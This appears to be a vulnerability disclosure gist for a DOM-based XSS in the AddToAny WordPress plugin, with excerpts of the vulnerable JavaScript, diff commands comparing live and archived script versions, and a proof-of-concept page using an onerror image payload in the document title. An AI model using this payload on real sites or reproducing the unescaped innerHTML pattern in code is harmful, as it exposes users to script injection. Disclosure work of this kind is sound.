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Last active January 29, 2023 21:33
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DOM-based XSS in AddToAny

AddToAny WordPress plugin DOM-based XSS

Vulnerable script location :

Archived source : snapshot :

Comparison of script versions :

curl -s > real-page
curl -s > archived-page
cat archived-page | tr -d '\n' | sed 's#/\*.*\*/##' | sed 's#/web/20151017052627/##g' > temp && perl -pe 'chomp if eof' temp > archived-page-normalized
diff -q archived-page-normalized real-page
rm temp real-page archived-page archived-page-normalized

Expanded script source (JSNice'd) :

Description :

The 'linkname' attribute of the 'config' parameter is populated from document.title. document.title, even when containing escaped HTML, will return unescaped HTML. The 'linkname' attribute is then passed into the 'main' element's innerHTML without any additional escaping, which opens the possibility for XSS.

Vulnerable Code (expanded) :

Line 179 - 224:

var init = function(config, e) {
 var main = document.createElement("div");
 var name = a2a.getData(item)["a2a-title"];
 config.linkname = e.linkname = name || config.linkname;
 config.linkurl = e.linkurl = opt_button || config.linkurl;
 main.innerHTML = config.linkname;

Line 264-297

self.linkname = a2a[self.type].last_linkname = options.linkname || (a2a[self.type].last_linkname || (document.title || location.href));
self.linkurl = a2a[self.type].last_linkurl = options.linkurl || (a2a[self.type].last_linkurl || location.href);
self.linkname_escape = options.linkname_escape;
if (a2a.locale && !dataAndEvents) {
 a2a.fn_queue.push(function(self, data) {
  return function() {
   init(self, data);
 }(self, d));
} else {
 init(self, d);

Proof-of-concept HTML :

<!DOCTYPE html>
<title>You searched for &quot;&gt;&lt;img src=x onerror=alert(1)&gt;</title>
    y = document.createElement('a');
    y.innerHTML = ( document.title || location.href );
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